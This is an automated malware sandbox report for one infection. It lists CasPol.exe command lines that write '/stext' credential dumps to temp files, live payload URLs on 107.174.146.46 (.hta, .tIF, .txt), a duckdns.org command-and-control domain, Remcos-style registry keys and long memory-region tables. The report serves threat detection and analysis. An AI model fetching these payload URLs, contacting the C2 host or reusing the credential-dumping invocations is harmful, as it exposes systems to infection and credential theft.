 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
There are 29 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF
107.174.146.46
 malicious
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
107.174.146.46
 malicious
http://107.174.146.46/57/RFGGVFRR.txt
107.174.146.46
 malicious
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaain
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaN
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaE
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
https://www.google.com
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://www.msn.com/?ocid=iehp
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...
unknown
https://nuget.org/nuget.exe
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain
172.67.162.95
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htal
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyX
unknown
http://107.174.146.46/57/picture
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-v
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://drive.google.com
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://107.174.146.46/
unknown
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://ocsp.entrust.net03
unknown
https://acesso.run/O
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;
unknown
https://contoso.com/License
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFp
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://acesso.run/p
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
https://contoso.com/
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
https://drive.usercontent.google.com
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
https://acesso.run/
unknown
http://ocsp.entrust.net0D
unknown
https://acesso.run/koE
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
https://acesso.run/d
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrain
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://acesso.run/)
unknown
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainI
unknown
https://secure.comodo.com/CPS0
unknown
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htant
unknown
http://www.imvu.com/k
unknown
http://www.ebuddy.com
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
seemebest2024rmc.duckdns.org
107.175.130.20
 malicious
acesso.run
172.67.162.95
geoplugin.net
178.237.33.50
drive.google.com
142.250.184.206
drive.usercontent.google.com
142.250.185.65

IPs

IP
Domain
Country
Malicious
107.174.146.46
unknown
United States
malicious
107.175.130.20
seemebest2024rmc.duckdns.org
United States
malicious
172.67.162.95
acesso.run
United States
104.21.74.191
unknown
United States
142.250.184.206
drive.google.com
United States
172.217.16.193
unknown
United States
178.237.33.50
geoplugin.net
Netherlands
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7%0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2817F
2817F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{,0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31E59
31E59
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31F53
31F53
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3259A
3259A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31F53
31F53
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 82 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
40EE000
trusted library allocation
page read and write
55D0000
heap
page read and write
3858000
trusted library allocation
page read and write
3709000
heap
page read and write
36B4000
heap
page read and write
41F0000
trusted library allocation
page read and write
7FFFFF88000
trusted library allocation
page readonly
42B000
heap
page read and write
20E6000
trusted library allocation
page read and write
49D000
heap
page read and write
583E000
trusted library allocation
page read and write
385B000
trusted library allocation
page read and write
32EA000
trusted library allocation
page read and write
3504000
heap
page read and write
3A2000
heap
page read and write
567A000
heap
page read and write
3A01000
heap
page read and write
3730000
heap
page read and write
398E000
heap
page read and write
479000
heap
page read and write
428E000
trusted library allocation
page read and write
1A578000
stack
page read and write
4D94000
heap
page read and write
41A000
heap
page read and write
DC000
stack
page read and write
5E62000
heap
page read and write
7FE8996C000
trusted library allocation
page execute and read and write
5524000
heap
page read and write
466000
heap
page read and write
371B000
heap
page read and write
140000
heap
page read and write
31A000
heap
page read and write
316000
heap
page read and write
3298000
trusted library allocation
page read and write
327A000
trusted library allocation
page read and write
43AD000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
4CB000
heap
page read and write
581E000
trusted library allocation
page read and write
4C5000
heap
page read and write
3B7F000
heap
page read and write
3F4000
heap
page read and write
4A0000
heap
page read and write
55C5000
heap
page read and write
4C8000
heap
page read and write
366000
heap
page read and write
1A64F000
stack
page read and write
4830000
heap
page read and write
359000
heap
page read and write
33D000
heap
page read and write
1B380000
heap
page read and write
3858000
trusted library allocation
page read and write
5040000
heap
page read and write
50DA000
heap
page read and write
7FFFFF82000
trusted library allocation
page readonly
428E000
trusted library allocation
page read and write
5D23000
heap
page read and write
36F9000
heap
page read and write
4E77000
heap
page read and write
32A7000
trusted library allocation
page read and write
3A37000
heap
page read and write
415000
heap
page read and write
2E5000
heap
page read and write
1D7C000
heap
page read and write
4556000
trusted library allocation
page read and write
3A47000
heap
page read and write
3B93000
heap
page read and write
43A1000
trusted library allocation
page read and write
1BB0000
heap
page read and write
3FA000
heap
page read and write
3941000
heap
page read and write
52C0000
heap
page read and write
404000
heap
page read and write
40EE000
trusted library allocation
page read and write
3B8D000
heap
page read and write
1CDC000
heap
page read and write
51D9000
heap
page read and write
3EA000
heap
page read and write
1C10000
trusted library allocation
page read and write
481000
heap
page read and write
3271000
trusted library allocation
page read and write
35A000
heap
page read and write
319E000
trusted library allocation
page read and write
4DD000
heap
page read and write
7756000
trusted library allocation
page read and write
54E8000
heap
page read and write
41A000
heap
page read and write
55C7000
heap
page read and write
3A37000
heap
page read and write
47C000
heap
page read and write
3B8A000
heap
page read and write
32EE000
trusted library allocation
page read and write
5672000
heap
page read and write
3B66000
heap
page read and write
583E000
trusted library allocation
page read and write
584F000
trusted library allocation
page read and write
350000
heap
page read and write
2E5000
heap
page read and write
7FE89A4C000
trusted library allocation
page read and write
3C6000
heap
page read and write
400000
system
page execute and read and write
51D9000
heap
page read and write
36E7000
heap
page read and write
1A61E000
heap
page execute and read and write
581E000
trusted library allocation
page read and write
3B6F000
heap
page read and write
4D92000
heap
page read and write
31A5000
trusted library allocation
page read and write
1CDD000
direct allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
496000
heap
page read and write
552E000
heap
page read and write
3195000
trusted library allocation
page read and write
55A000
heap
page read and write
43A1000
trusted library allocation
page read and write
228000
heap
page read and write
203F000
stack
page read and write
253000
heap
page read and write
380F000
stack
page read and write
5E6E000
heap
page read and write
424000
heap
page read and write
1B80000
heap
page read and write
32FD000
trusted library allocation
page read and write
55C5000
heap
page read and write
581E000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
2F9000
heap
page read and write
5C43000
heap
page read and write
584F000
trusted library allocation
page read and write
1A800000
heap
page execute and read and write
2159000
heap
page read and write
370D000
heap
page read and write
26BE000
stack
page read and write
5945000
trusted library allocation
page read and write
5D6A000
heap
page read and write
2341000
trusted library allocation
page read and write
830000
heap
page read and write
4E0C000
heap
page read and write
1CDB000
direct allocation
page read and write
36F4000
heap
page read and write
4CF1000
heap
page read and write
2552000
trusted library allocation
page read and write
1CC0000
heap
page read and write
3B39000
heap
page read and write
356000
heap
page read and write
429000
heap
page read and write
3EA0000
trusted library allocation
page read and write
1B16E000
stack
page read and write
456000
system
page execute and read and write
55BC000
heap
page read and write
3B21000
heap
page read and write
428E000
trusted library allocation
page read and write
1CC7000
direct allocation
page read and write
3B72000
heap
page read and write
3B91000
heap
page read and write
520000
heap
page read and write
36AD000
stack
page read and write
7FE89AE0000
trusted library allocation
page read and write
4E3000
heap
page read and write
3B74000
heap
page read and write
1E80000
direct allocation
page read and write
1C015000
heap
page read and write
4D50000
heap
page read and write
3260000
remote allocation
page read and write
385B000
trusted library allocation
page read and write
50DA000
heap
page read and write
4C1000
heap
page read and write
290B000
heap
page read and write
5334000
heap
page read and write
428E000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
5D53000
heap
page read and write
32EE000
trusted library allocation
page read and write
13E000
heap
page read and write
370D000
heap
page read and write
51D5000
heap
page read and write
204F000
stack
page read and write
46D000
heap
page read and write
3B4B000
heap
page read and write
50C1000
heap
page read and write
546000
heap
page read and write
1DF0000
heap
page execute and read and write
1B40000
trusted library allocation
page read and write
32F5000
trusted library allocation
page read and write
41A000
heap
page read and write
58A0000
trusted library allocation
page read and write
50D6000
heap
page read and write
208F000
stack
page read and write
1DA5000
heap
page read and write
50BE000
heap
page read and write
3858000
trusted library allocation
page read and write
3B8D000
heap
page read and write
10000
heap
page read and write
2120000
heap
page read and write
4E0C000
heap
page read and write
7FFFFF84000
trusted library allocation
page readonly
3193000
trusted library allocation
page read and write
4E3000
heap
page read and write
581E000
trusted library allocation
page read and write
515C000
heap
page read and write
3AA000
heap
page read and write
5DEC000
heap
page read and write
2FC000
heap
page read and write
41A000
heap
page read and write
37B0000
trusted library allocation
page read and write
259E000
stack
page read and write
4BB000
heap
page read and write
40C000
heap
page read and write
51BD000
heap
page read and write
581E000
trusted library allocation
page read and write
51D6000
heap
page read and write
43AD000
trusted library allocation
page read and write
51D5000
heap
page read and write
649000
heap
page read and write
288000
heap
page read and write
4C0000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
51D9000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
3298000
trusted library allocation
page read and write
22C000
stack
page read and write
411000
heap
page read and write
36A5000
heap
page read and write
2555000
trusted library allocation
page read and write
546000
heap
page read and write
371C000
heap
page read and write
1FE0000
heap
page read and write
43AD000
trusted library allocation
page read and write
56C0000
trusted library allocation
page read and write
3B3000
heap
page read and write
32F000
heap
page read and write
1DBF000
stack
page read and write
3846000
heap
page read and write
517B000
heap
page read and write
260C000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
569A000
heap
page read and write
3B4E000
heap
page read and write
1AF8E000
stack
page read and write
3A7000
heap
page read and write
4D9C000
heap
page read and write
11F51000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
2A40000
heap
page read and write
410000
heap
page read and write
43A1000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
10000
heap
page read and write
5870000
trusted library allocation
page read and write
46D000
heap
page read and write
562E000
heap
page read and write
1D0000
heap
page read and write
38B000
stack
page read and write
55C2000
heap
page read and write
1C4FC000
stack
page read and write
46D000
heap
page read and write
266C000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
239E000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
11F30000
trusted library allocation
page read and write
12D000
heap
page read and write
40EE000
trusted library allocation
page read and write
1EC0000
heap
page read and write
4C1000
heap
page read and write
20000
heap
page read and write
1ACFE000
heap
page read and write
5526000
heap
page read and write
164000
heap
page read and write
3286000
trusted library allocation
page read and write
450000
heap
page read and write
428E000
trusted library allocation
page read and write
3199000
trusted library allocation
page read and write
3B8F000
heap
page read and write
22A000
heap
page read and write
4ECE000
heap
page read and write
584F000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
41A000
heap
page read and write
3B72000
heap
page read and write
55BA000
heap
page read and write
4C8000
heap
page read and write
55C7000
heap
page read and write
1FB000
heap
page read and write
3B72000
heap
page read and write
40EE000
trusted library allocation
page read and write
45F000
heap
page read and write
3B7000
heap
page read and write
5956000
trusted library allocation
page read and write
251E000
stack
page read and write
319B000
trusted library allocation
page read and write
630000
heap
page read and write
385B000
trusted library allocation
page read and write
3DE000
heap
page read and write
57A0000
trusted library allocation
page read and write
51C2000
heap
page read and write
5CF4000
heap
page read and write
5CC5000
heap
page read and write
3420000
trusted library allocation
page read and write
325C000
stack
page read and write
43A1000
trusted library allocation
page read and write
4BC000
heap
page read and write
565C000
heap
page read and write
3273000
trusted library allocation
page read and write
1A0000
heap
page read and write
4E0E000
heap
page read and write
3B8D000
heap
page read and write
3AC000
heap
page read and write
410000
heap
page read and write
53B000
heap
page read and write
429000
heap
page read and write
20000
heap
page read and write
1C2CF000
stack
page read and write
2F3000
heap
page read and write
442000
heap
page read and write
5849000
trusted library allocation
page read and write
3B95000
heap
page read and write
36B6000
heap
page read and write
4BB000
heap
page read and write
10000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
